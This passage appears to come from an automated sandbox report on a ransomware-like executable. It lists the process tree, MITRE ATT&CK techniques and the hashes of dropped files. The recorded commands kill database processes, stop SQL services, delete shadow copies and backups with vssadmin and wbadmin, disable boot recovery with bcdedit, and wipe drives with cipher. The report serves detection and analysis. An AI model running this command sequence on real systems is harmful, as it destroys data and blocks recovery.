    C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im MsDtsSrvr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3780
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sqlceip.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4004
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im fdlauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4328
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1300
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im Ssms.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:840
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
  2⤵
  PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:4880
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im SQLAGENT.EXE
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3872
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
  2⤵
  PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:2652
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im fdhost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2332
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
  2⤵
  PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:2416
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im ReportingServicesService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:744
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
  2⤵
  PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
  2⤵
  PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:3640
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
  2⤵
  PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:4608
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -impostgres.exe
      4⤵
      Kills process with taskkill
      PID:1772
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
  2⤵
  PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:1768
  - - C:\Windows\system32\net.exe
      net stop MSSQLServerADHelper100
      4⤵
      PID:2080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        5⤵
        
        PID:428
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
  2⤵
  PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:1856
  - - C:\Windows\system32\net.exe
      net stop MSSQL$ISARS
      4⤵
      PID:2996
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        5⤵
        
        PID:2888
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
  2⤵
  PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:1964
  - - C:\Windows\system32\net.exe
      net stop MSSQL$MSFW
      4⤵
      PID:3792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        5⤵
        
        PID:912
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
  2⤵
  PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:3824
  - - C:\Windows\system32\net.exe
      net stop SQLAgent$ISARS
      4⤵
      PID:1436
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        5⤵
        
        PID:3184
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
  2⤵
  PID:4836
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:468
  - - C:\Windows\system32\net.exe
      net stop SQLAgent$MSFW
      4⤵
      PID:4904
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        5⤵
        
        PID:4812
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
  2⤵
  PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:1868
  - - C:\Windows\system32\net.exe
      net stop SQLBrowser
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        5⤵
        
        PID:3640
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
  2⤵
  PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:3340
  - - C:\Windows\system32\net.exe
      net stop REportServer$ISARS
      4⤵
      PID:4424
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        5⤵
        
        PID:4912
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
  2⤵
  PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:2968
  - - C:\Windows\system32\net.exe
      net stop SQLWriter
      4⤵
      PID:2080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        5⤵
        
        PID:4356
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:2104
  - - C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:2416
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
  2⤵
  PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:2056
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      Deletes system backups
      PID:464
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:4492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic.exe SHADOWCOPY /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3028
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:1436
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1180
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
  2⤵
  PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:2652
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} recoverynabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3448
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
  2⤵
  PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:4304
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:4812
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:1804
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      Deletes System State backups
      Drops file in Windows directory
      PID:4904
- C:\Windows\SYSTEM32\cipher.exe
  cipher /w:\\?\A:
  2⤵
  - Enumerates connected drives
  PID:3320
- C:\Windows\SYSTEM32\cipher.exe
  cipher /w:\\?\C:
  2⤵
  PID:1288
- C:\Windows\SYSTEM32\cipher.exe
  cipher /w:\\?\F:
  2⤵
  - Enumerates connected drives
  PID:744

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3560
- C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -network
  2⤵
  - Adds Run key to start application
  PID:3620

C:\Windows\system32\taskkill.exe
taskkill -f -im msftesql.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2284,i,2771196087253062161,8107167670425198948,262144 --variations-seed-version /prefetch:8
1⤵
PID:1168

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbres00001.jrs

Filesize
1.0MB

MD5
ead7a951b78c6557419477cb787ee0bf

SHA1
24a1b10601936d2c5cae3dc298723a9c62afd5fb

SHA256
c1486b3cf916251a0d88b057c319c9f9b818709d9cb94dac462621337477e7c7

SHA512
55186adae197adfcbc7ea8780ab3644b1397a2f7b84aec13f9d6a4b959a4dcb3b15c201ab04368337b8a686d3535508f74147897ecf552cecf2c46ac9a693ae8

Download Submit
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.lock3

Filesize
624KB

MD5
efadff9f03e6460fb89bd64edc6c9102

SHA1
ef56d96f27906ea5ea2899fd4d3b598a116944a9

SHA256
0d5027990ba64e2f6bc287140161fddf44b1a6a0438b853bfeedb961869730d4

SHA512
a6254282923ec4a0d898e0101b13fad16152fdb423fbf4847cbd9cf808513b888be18334c17833ef630aba19da67af620f75346e4fe7263eb1b6b5e1fc861e1e

Download Submit
C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms

Filesize
513KB

MD5
0798686a3c416bba950611733bab0444

SHA1
d373e14edf1bae7394593d624b821ed36fd4cb13

SHA256
0e36a256bc2aaa6fb249d520e97140de69ddab102cfae1da5ea0cef2b337a35e

SHA512
cb565fa5f24c4ee0edfb5c8d3b61db04993d727608362101b0985eed5098260eea4a4673780d3e04869a0dbeab110dd734a717e390ef1b26bd7c7715ffe142b7

Download Submit